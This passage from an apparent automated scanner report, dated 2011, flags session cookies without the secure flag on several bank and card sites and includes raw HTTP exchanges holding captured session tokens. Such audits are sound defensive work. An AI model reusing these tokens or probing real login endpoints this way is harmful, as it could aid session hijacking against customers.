Set-Cookie: cp_session=aUGR7btxDd%7EjlgKRgeiuzFM8p6eU1yRBCBQqdEPwIv_mBJb0QQTkulO2GBOGO8_N3eWzNq_zhrCzbCwS1_2InE_sjrMT_CzzQ4bcd3L%7EVGKEV%7EsWtrcf8hb492HLMcyosrWfnnlKLB3MHiSs0Q4K2kIHOUKE6UBlYK; path=/; httponly
Location: https://arbor.custhelp.com/app/utils/login_form/redirect/webinar
RNT-Time: D=216440 t=1296691487850159
RNT-Machine: 05
F5_do_compression: yes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Connection: close


6.16. https://chaseonline.chase.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://chaseonline.chase.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: chaseonline.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 17909
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=363a4a0a-9240-4195-9a73-ca0f1962dd7b; domain=.chase.com; path=/
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=5BE36DBE8BA5F8DB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
Date: Wed, 02 Feb 2011 22:02:00 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta http-equiv="Pragma" content="no-cache"/
...[SNIP]...

6.17. https://locations.citibank.com/citibankV2/prxInput.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://locations.citibank.com
Path:   /citibankV2/prxInput.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /citibankV2/prxInput.aspx HTTP/1.1
Host: locations.citibank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 143
Content-Type: text/html; charset=utf-8
Location: /citibankV2/Index.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1lqcuirll4aur455pgm1mg45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:11:31 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fcitibankV2%2fIndex.aspx">here</a>.</h2>
</body></html>

6.18. https://militarybankonline.bankofamerica.com/efs/servlet/military/login.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://militarybankonline.bankofamerica.com
Path:   /efs/servlet/military/login.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /efs/servlet/military/login.jsp HTTP/1.1
Host: militarybankonline.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:02:04 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: max-age=0, must-revalidate
Expires: 0
Set-Cookie: JSESSIONID=0000b-vSBbrptaMHzr-HBHKCPg0:13393tt7e; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 12540


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<noscript>
<META H
...[SNIP]...

6.19. https://myaccountsaws.navyfcu.org/mfnfopwd/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://myaccountsaws.navyfcu.org
Path:   /mfnfopwd/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mfnfopwd/ HTTP/1.1
Host: myaccountsaws.navyfcu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:02:06 GMT
Server: IBM_HTTP_Server
Content-Length: 12458
Set-Cookie: JSESSIONID=0001y-jIhHTKM6s3Y1_oSLOT9oS:15cea9hua; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US

<?xml version="1.0" encoding="ISO-8859-1" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<meta http-eq
...[SNIP]...

6.20. https://online.cardmemberservices.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://online.cardmemberservices.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: online.cardmemberservices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 18175
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=644d4c8d-b94c-4f70-9bbb-9d78f24ce9f8; domain=.cardmemberservices.com; path=/
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=6FA7CC6BF769141F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com
Date: Wed, 02 Feb 2011 22:02:10 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta http-equiv="Pragma" content="no-cache"/
...[SNIP]...

6.21. https://secure.opinionlab.com/ccc01/comment_card.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/comment_card.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6067
Content-Type: text/html; Charset=UTF-8
Set-Cookie: ASPSESSIONIDCQATDDAR=FGIHILFAKFPCACOOHKFEFHBP; path=/
Date: Wed, 02 Feb 2011 22:02:31 GMT
Connection: close

<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment Ca
...[SNIP]...

6.22. https://secure.opinionlab.com/rate36s.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /rate36s.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rate36s.asp? HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQATDDAR=NGIHILFABKDPKDCHAENGBKCJ; path=/
Date: Wed, 02 Feb 2011 22:02:33 GMT
Connection: close

invalid call method

6.23. https://shop.aafes.com/shop/ECC/Account/OlApp.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://shop.aafes.com
Path:   /shop/ECC/Account/OlApp.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shop/ECC/Account/OlApp.aspx HTTP/1.1
Host: shop.aafes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Set-Cookie: AAFES=R1966950070; path=/
Connection: close
Date: Thu, 03 Feb 2011 01:04:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Location: https://shop.aafes.com/shop/Login.aspx?ReturnURL=https://shop.aafes.com/shop/ECC/Account/OlApp.aspx
Set-Cookie: ASP.NET_SessionId=2n4tod55edqnia45xomyrlzq; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 216

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://shop.aafes.com/shop/Login.aspx?ReturnURL=https://shop.aafes.com/shop/ECC/Account/OlApp.aspx">here</a>.</h2>

...[SNIP]...

6.24. https://sitekey.bankofamerica.com/sas/resetIDScreen.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://sitekey.bankofamerica.com
Path:   /sas/resetIDScreen.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sas/resetIDScreen.do HTTP/1.1
Host: sitekey.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:02:35 GMT
Content-type: text/html
Set-Cookie: TLTSID=244C13942F18102F3BD996FBE0492B85; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=244C13942F18102F3BD996FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: no-cache="set-cookie,set-cookie2"
P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes
Content-language: en-US
Set-cookie: GSLSESSIONID=0000s0eMf9y2EnRfOFlN2C8I1eP:13k5uohoo; Path=/
Connection: close


6.25. https://sitekey.bankofamerica.com/sas/resetPasscodeScreen.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://sitekey.bankofamerica.com
Path:   /sas/resetPasscodeScreen.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sas/resetPasscodeScreen.do HTTP/1.1
Host: sitekey.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:02:35 GMT
Content-type: text/html
Set-Cookie: TLTSID=2452CCDE2F18102F3BDB96FBE0492B85; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=2452CCDE2F18102F3BDB96FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: no-cache="set-cookie,set-cookie2"
P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes
Content-language: en-US
Set-cookie: GSLSESSIONID=0000kF4ME17cVzwHT7rf0vMZses:13k5uolvs; Path=/
Connection: close


6.26. https://sitekey.bankofamerica.com/sas/signon.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://sitekey.bankofamerica.com
Path:   /sas/signon.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sas/signon.do HTTP/1.1
Host: sitekey.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:02:35 GMT
Content-type: text/html
Set-Cookie: TLTSID=2465625E2F18102F3BDD96FBE0492B85; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=2465625E2F18102F3BDD96FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: no-cache="set-cookie,set-cookie2"
P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes
Content-language: en-US
Set-cookie: GSLSESSIONID=0000xqKx0Pm6KLlxeiVVja8EmdE:13k5uoqt5; Path=/
Connection: close


6.27. https://support01.arbornetworks.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support01.arbornetworks.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: support01.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:05:00 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8d PHP/5.2.3
X-Powered-By: PHP/5.2.3
Set-Cookie: PHPSESSID=2eba1bedd93d630fa422ccbd7765c32e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 1713
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

6.28. https://usa.visa.com/signaturesouthwest/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://usa.visa.com
Path:   /signaturesouthwest/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signaturesouthwest/index.jsp HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.3.9.1296683997731; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: Microsoft-IIS/7.0
Server: WebSphere Application Server/6.1
Content-Length: 47255
Expires: Wed, 02 Feb 2011 22:00:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 22:00:39 GMT
Connection: close
Set-Cookie: JSESSIONID=0001VKlai2ZsKlTeafG4JBzP1Nr:228FL7VA3T; Path=/
P3P:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...

6.29. https://usa.visa.com/specialOffers/FUSA_Amazon/offers.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://usa.visa.com
Path:   /specialOffers/FUSA_Amazon/offers.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /specialOffers/FUSA_Amazon/offers.jsp HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Length: 9470
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: Microsoft-IIS/7.0
Server: WebSphere Application Server/6.1
Expires: Wed, 02 Feb 2011 22:03:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 22:03:02 GMT
Connection: close
Set-Cookie: JSESSIONID=0001gwyQs-o2EJ3BQoQrJFaalkY:228FL7VA3T; Path=/
P3P:


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
   <title>Visa Rewards Online | Shopping Offers</title>
   <meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

6.30. https://www.1sttools.com/loginout/login.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.1sttools.com
Path:   /loginout/login.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /loginout/login.asp HTTP/1.1
Host: www.1sttools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 21:54:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 11382
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCARABDDQ=FABHMNIADKMFMMNBNHMMMOCM; path=/
Cache-control: private


<html>
<head>
   <title>LendingTools.com</title>
</head>


   <body onLoad="hndOnLoad();document.forms[0].username.focus();" bgcolor="#FFFFFF" leftmargin="0" topmargin="0" rightmargin="0">



...[SNIP]...

6.31. https://www.bankofamerica.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:22 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=D98FA69C2F17102F856AA91CC30F81BB; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:00:22 GMT
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; Path=/
Set-Cookie: BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; Expires=Sun, 02 Feb 2031 22:00:22 GMT; Path=/; Domain=.bankofamerica.com
Set-Cookie: CONTEXT=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: INTL_LANG=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: LANG_COOKIE=en_US; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 48180


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...

6.32. https://www.bankofamerica.com/Control.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /Control.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Control.do?body=where_passcode_popup HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:48 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000hLN0EFuVu6_KB0QSkbXPq6x:12qb4k4pc; Path=/
Set-cookie: INTL_LANG=en_US
Set-cookie: ngen_throttle=497; Expires=Mon, 01 Aug 2011 22:04:48 GMT; Path=/; Domain=.bankofamerica.com
Set-cookie: hp_beta=B; Expires=Mon, 01 Aug 2011 22:04:48 GMT; Path=/; Domain=.bankofamerica.com
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:04:48 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description
...[SNIP]...

6.33. https://www.bankofamerica.com/credit-cards/cardoverview.action  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /credit-cards/cardoverview.action

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /credit-cards/cardoverview.action HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:05:02 GMT
Content-length: 0
Content-type: text/html
Set-Cookie: SMIDENTITY=OCd1eUfyEcTBcdzRmikiUYt9Hcisc1Gh1u9btfXo6jk2iYwtjhebVw1nhgFF6KlmpRdXfWP6oAE1ISBtgIxM3LdoctvAzX27T3D45PQOpMJUeowFgmjuCz+RpSn04+9WLMmF4p/3qP0PVzBHFGFRkzwE5OaT/L0iv4fa0f523oTajKE7dlB/qRvRq16VC3uwSY8nOHjQWKuYZVD9y/EOzzuIC2pbtUE0yVubP+/mxg6D0sevE7x0PoB27bkshtOSL/Y89tKz1feb+T0FxZmgtayMUMoPsHrOu12vLkQLE2hAqZxHc87W+lL+ksrLFRBrg4mECaTf+Y2rhBFThgksB7a7YrXy+P+M1KZi7PFBOBkLBEHb3SHeMWenl/tgGDcsiPv5/+zELJAWZV22EzuihOycvz+1s2wi3UZYCS29J/mO6EQk8LZM1BJ2vaI7/Ay00YstlYJeyAGWhaR17eKkiv9oj3iMJJS7V2AOTwlg0pwItcgPIQ2pQAGe75FFiHk7; path=/; domain=.bankofamerica.com; secure
Location: https://www.bankofamerica.com/credit-cards/viewall.action?context_id=all_cards
Content-language: en-US
Set-cookie: JSESSIONID=0000RfDmnLt4u-iNR9enyTATw_C:12qb4kb6q; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


6.34. https://www.bankofamerica.com/deposits/index.action  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /deposits/index.action

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /deposits/index.action HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:53 GMT
Content-length: 0
Location: https://www.bankofamerica.com/global/stateselection.action?returnUrl=https://www.bankofamerica.com/deposits/index.action
Content-language: en-US
Set-cookie: JSESSIONID=0000sNWjiXby7ONUwh45995dJgv:12qb4k93q; Path=/
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:04:52 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


6.35. https://www.bankofamerica.com/homepage/WidgetAction.go  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /homepage/WidgetAction.go

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /homepage/WidgetAction.go HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:36:37 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Content-Length: 11
